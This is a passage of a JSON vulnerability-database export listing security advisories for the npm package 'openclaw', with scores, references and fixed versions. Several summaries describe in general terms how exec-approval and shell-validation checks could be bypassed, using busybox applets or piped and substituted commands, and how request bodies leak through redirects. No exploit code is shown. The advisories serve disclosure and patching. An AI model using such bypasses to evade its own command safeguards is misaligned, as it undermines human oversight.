7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes"},{"reference_url":"https://github.com/advisories/GHSA-c4qm-58hj-j6pj","reference_id":"GHSA-c4qm-58hj-j6pj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c4qm-58hj-j6pj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-42436","GHSA-c4qm-58hj-j6pj"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6wth-qthz-yud8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89630?format=json","vulnerability_id":"VCID-6y5w-am4s-6qa5","summary":"OpenClaw: busybox and toybox applet execution weakened exec approval binding\n## Summary\n\nbusybox and toybox applet execution weakened exec approval binding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.23 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nOpaque multi-call binaries such as `busybox` and `toybox` could obscure which applet or script-like behavior would actually run, weakening exec approval binding and risk classification.\n\n## Technical Details\n\nThe fix treats `busybox` and `toybox` as opaque mutable script runners and fails closed rather than binding unsafe applet invocations.\n\n## Fix\n\nThe issue was fixed in #65713. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `666f48d9b882a8a1415ca53f9567c72499d850c9`\n- PR: #65713\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43530","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19015","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21375","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21421","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43530"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65713","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65713"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43530","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43530"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution"},{"reference_url":"https://github.com/advisories/GHSA-2cq5-mf3v-mx44","reference_id":"GHSA-2cq5-mf3v-mx44","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2cq5-mf3v-mx44"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-43530","GHSA-2cq5-mf3v-mx44"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6y5w-am4s-6qa5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89784?format=json","vulnerability_id":"VCID-733f-57ds-xugm","summary":"Duplicate Advisory: OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"},{"reference_url":"https://github.com/advisories/GHSA-rf75-g96h-j3rm","reference_id":"GHSA-rf75-g96h-j3rm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rf75-g96h-j3rm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-rf75-g96h-j3rm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-733f-57ds-xugm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/88995?format=json","vulnerability_id":"VCID-73cz-n29z-uqem","summary":"Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"},{"reference_url":"https://github.com/advisories/GHSA-pg8g-f2hf-x82m","reference_id":"GHSA-pg8g-f2hf-x82m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pg8g-f2hf-x82m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-pg8g-f2hf-x82m"],"risk_score":4.0,"exploitability":"0.5","weig